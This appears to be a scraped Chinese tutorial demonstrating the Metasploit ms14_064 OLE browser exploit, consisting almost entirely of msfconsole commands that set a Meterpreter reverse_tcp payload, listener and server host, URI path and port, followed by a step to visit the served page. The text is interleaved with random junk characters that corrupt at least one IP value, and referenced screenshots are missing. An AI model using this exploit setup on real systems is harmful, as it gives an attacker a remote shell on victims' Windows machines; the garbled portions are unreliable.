! h0 t" v- ^- ~( J+ A5 U
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示5 }! J4 r/ G" m* T4 u- s
! L+ m' I& w; F; {+ V4 @# F: J* R6 n# r: S/ c7 a1 J
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
) P6 B; y- M- M/ b3 S
8 L, N5 f. O: v1 B3 F* P8 M; I$ f9 k' j! M
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp d. w0 X/ v0 E$ Q$ k, l3 ?3 b+ m
, G) Z' t" P0 l. l' o8 ]8 U+ j) ?, g. P- w' ~
set AllowPowershellPrompt true
- f" |' c: h& L \+ q+ m9 Z! |
; a2 Z9 j2 ~$ m0 N( q
% F" x' ^- A3 a, O. F* W Set LHOST 192.168.0.109
. }5 W4 ~( ~+ B' a% Z4 h+ z
+ d. | l) R" D
. _) y8 S- W0 w- \6 l( U S set SRVHOST 192.168.0.1093 H: ~- U" @/ G9 t1 T; a: t" H
# Y2 d+ U" U- d5 I) U* O& r
P2 `$ O* I7 F( L S* X5 ^! q/ c
Set uripath share
4 h0 ?, M* y) o2 S. S3 _$ `$ K' u
/ L8 b8 A% b% b" J( Y# z& k
! Z0 Y2 w- \& [+ e& F Set srvport 80
0 o- r2 [* Q6 W( I' j& l/ t$ ~
@5 l' x% D- I, O" D
/ [0 m* A- C& T+ ~( {6 _8 J
/ N: U+ C, q* p# m1 k
6 S# Z f1 E% w* ]' @
0 c+ j3 K9 `- Z ) K( v w' m; |/ }7 A, u
6 U4 } s' w z/ G+ R2 i
! g# k+ d1 |1 p' i! O+ h
1 f, | X0 ~) S
4 E# V7 S3 B9 `) G* ^
. B+ O5 C% s5 \1 ]7 m . k/ Q6 c' G ^- S. y( \
E: I8 E# Q0 t/ W: |$ R/ b5 X
: G h* [( R6 N, M; O5 y
( ?2 V* ` p6 b- x. Q8 p
. x' A' U! [- J8 J$ y
9 [/ b; Q3 g2 @# w$ x
下面我们来访问本地地址如图:* ^: Y4 r; q, B* y( M+ Y
; C8 R, _/ D5 g8 d- y$ m
$ G& _6 Q# Y# z S) H- P3 O
$ { T# W+ R' |$ ~/ D9 J+ w z
! W# [ f( s- M# h/ r4 h2 o
+ u. |( _* _. z7 Y! P
4 C& u+ I4 y# X
+ ?% G V% V/ V5 o( L
. }7 ?8 V* u0 q! ~4 Y
* Q8 K/ J; w: }' f* R' Z+ \3 ]1 T